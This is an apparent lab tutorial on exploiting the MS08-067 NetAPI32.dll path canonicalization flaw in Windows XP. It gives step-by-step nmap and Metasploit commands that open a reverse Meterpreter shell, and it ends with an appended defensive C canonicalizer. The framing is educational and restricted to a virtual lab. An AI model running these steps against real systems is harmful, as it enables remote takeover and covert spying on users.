Exploiting NetAPI32.dll Using Metasploit
In this article of OP3N, we’re going to see how Windows XP machines can be hacked just by knowing their IP addresses. It should be noted, however, that only a few government offices in India still use Windows XP, because of poor software management. I suggest that you do not go looking for offices to crack. Instead, let’s just go through hacking a Windows XP machine in a virtualized environment.
The problem is that nobody is spending enough money to upgrade their software to newer operating systems, and Microsoft is no longer patching Windows XP. So we’re left with an unpatched and vulnerable operating system. Now, enough with the details; you already know this. Let’s move on and see what we’re actually going to exploit on a remote Win XP machine.

There are numerous ways to exploit a Win XP machine. Today, we’re going to exploit the parsing flaw in the path canonicalization code of NetAPI32.dll used by the Server service, as described in CVE-2008-4250.

So, what exactly is the Server service vulnerability? The Server service in Microsoft Windows provides support for sharing resources, such as files and print services, over a network. This service is vulnerable to remote code execution, and NetAPI32.dll is the cause of the vulnerability. When a path name containing a directory traversal character sequence is processed, NetAPI32.dll handles it incorrectly. The vulnerability can be exploited by corrupting stack memory; for example, by sending RPC requests that contain specially crafted path names to the Server service component. The affected function is NetprPathCanonicalize() in NetAPI32.dll. This vulnerability is not limited to Windows XP: Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008 can also be exploited through this method.

Exploitation

Since I’m doing all this in a virtualized environment, I’ve created two virtual machines and installed Win XP on one and Kali Linux on the other. First, go to your Win XP machine and open the command prompt. Type ipconfig to identify the IP address of the vulnerable machine. For example, the IP address of my Win XP machine is 10.0.0.1. Fire up the Kali Linux machine and open a terminal. Inside the terminal, run the following command to get a list of all open ports and the version of the operating system:
#nmap -O 10.0.0.1

At this point, we’ve gathered a lot of information, and now it’s time to fire up Metasploit! Go over to the terminal in Kali and type msfconsole. It’ll take a while to open up, and once it does, use the search command to find modules related to netapi:

> search netapi

There, you’ll find the module exploit/windows/smb/ms08_067_netapi. This is the module we’re going to use for our exploitation. Select the Meterpreter payload and the MS08-067 module, then list the module’s options:

> set payload windows/meterpreter/reverse_tcp
> use exploit/windows/smb/ms08_067_netapi
> show options

Now, set LHOST to 10.0.0.3 (the IP of my Kali machine):

> set LHOST 10.0.0.3

Set RHOST to 10.0.0.1 (the IP of my Win XP machine):

> set RHOST 10.0.0.1

Finally, type exploit to start the remote exploitation process. It’ll open a Meterpreter session between your Kali machine and the Windows machine that lets you execute commands on the Win XP machine. For example, the screenshot command takes a screenshot of the target machine without the user working on that remote machine knowing about it.
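The defensive side of the path canonicalization flaw described above, as an added example that is not part of the original article: the real NetprPathCanonicalize() code is not shown on this page, so this is an illustrative bounded canonicalizer (the function name canonicalize_path and the backslash-only path syntax are assumptions) that resolves `.` and `..` segments in a fixed-size buffer and refuses, instead of walking before the start of its buffer, when a traversal sequence would escape the root or the result would not fit.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative bounded canonicalizer (not the NetAPI32.dll code).
 * Resolves "." and ".." in a backslash-separated path starting at "\".
 * Returns 1 on success with the result in out, 0 when the path would
 * traverse above the root or would not fit in out_len bytes. */
int canonicalize_path(const char *in, char *out, size_t out_len)
{
    size_t pos = 0;                 /* out[0..pos) holds the result so far */
    const char *p = in;

    if (out_len < 2 || *p != '\\')
        return 0;                   /* need at least "\" plus NUL */
    out[pos++] = '\\';
    p++;

    while (*p) {
        const char *seg = p;
        while (*p && *p != '\\')
            p++;
        size_t seg_len = (size_t)(p - seg);
        if (*p == '\\')
            p++;

        if (seg_len == 0 || (seg_len == 1 && seg[0] == '.'))
            continue;               /* "\\" or "\.\" contribute nothing */

        if (seg_len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (pos == 1)
                return 0;           /* ".." at the root: refuse, never walk back past out[0] */
            pos--;                  /* drop the trailing '\\' of the previous segment */
            while (pos > 1 && out[pos - 1] != '\\')
                pos--;              /* bounded by the root separator at out[0] */
            continue;
        }

        if (pos + seg_len + 1 > out_len)
            return 0;               /* segment plus separator must fit */
        memcpy(out + pos, seg, seg_len);
        pos += seg_len;
        out[pos++] = '\\';
    }

    if (pos > 1)
        pos--;                      /* strip the trailing separator unless the result is "\" */
    out[pos] = '\0';
    return 1;
}
```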